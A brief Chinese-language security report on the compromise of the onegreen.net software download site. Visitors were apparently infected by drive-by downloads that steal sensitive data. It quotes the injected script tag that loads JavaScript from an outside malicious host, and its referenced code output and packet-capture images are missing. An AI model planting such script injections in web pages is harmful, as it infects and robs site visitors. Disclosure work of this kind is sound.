绿色软件站挂马事件

　近日安天实验室反病毒监测网发现，绿色软件站 (http://www.onegreen.net/index.asp)被黑客植入病毒，利用了Cookies 欺骗漏洞挂马，用户如果访问该网站，会被病毒感染。系统就会自动从恶意网站上下载并运行多个 ...　近日安天实验室反病毒监测网发现，绿色软件站 (http://www.onegreen.net/index.asp)被黑客植入病毒，利用了Cookies 欺骗漏洞挂马，用户如果访问该网站，会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。盗取用户敏感信息。

　　该网站的主页里被插入如下框架：

　　

　　代码：

      <script language="JavaScript"
　　src="http://ad.goosms.cn/adv/onegreen.asp
　　?cid157&a=&b=&c=&d=&e=&f=" type="text/javascript" 　　id="onegreen"></script>

      http://ad.goosms.cn/adv/onegreen.asp?
　　cid157&a=&b=&c=&d=&e=&f=

      得到代码如下：

　　

　　从代码分析并未分析出可疑的地方，对其抓包分析发现利用了Cookies欺骗漏洞挂马。

　　抓包结果如图：

　　

　　从抓包来看出其利用的Cookies 欺骗挂马方式。关键字：被黑